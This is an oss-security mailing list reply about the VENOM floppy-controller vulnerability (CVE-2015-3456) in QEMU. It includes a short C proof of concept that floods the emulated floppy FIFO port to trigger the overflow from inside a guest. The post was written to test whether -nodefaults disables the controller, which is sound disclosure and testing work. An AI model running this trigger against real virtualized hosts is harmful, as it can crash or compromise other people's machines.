Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 13 May 2015 23:20:40 +0200
From: Marcus Meissner <meissner@...e.de>
To: oss-security@...ts.openwall.com
Subject: Re: VENOM - CVE-2015-3456

On Wed, May 13, 2015 at 11:57:20PM +0300, Solar Designer wrote:
> On Wed, May 13, 2015 at 12:22:19PM +0000, Jason Geffner wrote:
> > VENOM, CVE-2015-3456, is a security vulnerability in the virtual floppy drive code used by many computer virtualization platforms.
> 
> Some bits of contemporary history, off Twitter:
> 
> <nelhage> All I have to say about VENOM is that I was exploiting obsolete hardware in qemu years before it was cool.  https://blog.nelhage.com/2011/08/breaking-out-of-kvm/
> <solardiz> @nelhage I think @taviso was there first, with emulated Cirrus Logic VGA (CVE-2007-1320) and NE2000 vulns in QEMU.  http://taviso.decsystem.org/virtsec.pdf

Yeah, we fixed a lot of them, some less, some more exploitable.

As I had some confusion on if the fdc is disabled or not in regards to
the -nodefaults, so I wrote a small PoC.

(and no, -nodefaults does not disable the fdc)

Ciao, Marcus

#include <sys/io.h>

#define FIFO 0x3f5

int main() {
        int i;
        iopl(3);

        outb(0x0a,0x3f5); /* READ ID */
        for (i=0;i<10000000;i++)
                outb(0x42,0x3f5); /* push */
}

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ